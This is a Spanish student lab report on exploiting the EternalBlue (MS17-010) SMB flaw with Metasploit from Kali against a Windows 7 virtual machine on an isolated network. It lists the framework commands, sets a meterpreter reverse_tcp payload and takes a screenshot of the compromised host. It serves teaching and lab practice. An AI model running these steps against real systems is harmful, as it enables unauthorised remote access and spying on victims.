- Alumno: Fernando Páez Martín
- Curso: 2ºB - A.S.I.R.
- IES Punta del Verde
Haremos una busqueda de información sobre esta herramienta que permite ejecutar y desarrollar exploits contra sistemas objetivos. La primera opción antes de usar la propia herramienta va a consistir en recopilar información sobre el sistema objetivo. A partir de los datos obtenidos, se tomarán las decisiones acordes y los pasos a seguir en etapas posteriores.
- Descarga de las herramientas de Metasploitable y Máquina Virtual de Kali linux.
- Descarga de imagen iso de windows 7 para realizar el estudio de la vulnerabilidad y creacion de la máquina virtual.
La tarea a desarrollar irá enfocada a la vulnerabilidad catalogada en la base de datos de vulnerabilidades CVE como:
EternalBlue explota una vulnerabilidad en protocolo Server Message Block (SMB). Esta vulnerabilidad se dio porque el servidor SMB v1 (SMBv1) de Microsoft Windows manejaba mal paquetes especialmente diseñados por atacantes remotos, permitiendo ejecutar código sobre el equipo a que ataca.
Se configuran en un entorno llamado "Red Interna" y dentro del mismo rangode red:
-
Kali con 10.0.2.10/8
-
Windows con 10.0.2.11/8
-
Comprobamos que las dos máquinas tienen conectividad entre si haciendo ping entre ellas:
Con esta herramienta descubriremos puertos y servicios abiertos en la máquina objetivo.
En la primera fase ejecutaremos este framework para buscar exploits usar, descargar payloads y ejecutarlos.
msfconsole
Usaremos su buscador para encontrar el exploit:
search eternalblue
De los resultados elegiremos la primera opción:
0 exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
use 0
Nos devuelve:
No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
Vemos que parámetros son requeridos con el comando: options
nos pide datos del equipo remoto o RHOST. Le indicamos la ip del equipo remoto 10.0.2.11
Podemos ver una serie de payloads a ejecutar:
Vamos a realizar la prueba con el siguiente windows/x64/meterpreter/reverse_tcp:
Le indicamos que se ejecute con run
Podemos ver las distintas opciones que nos ofrece este exploit con options
Como ejemplo ejecutaremos el comando screenshot y nos hará una captura de pantalla de la máquina remota.
Mostramos la captura realizada: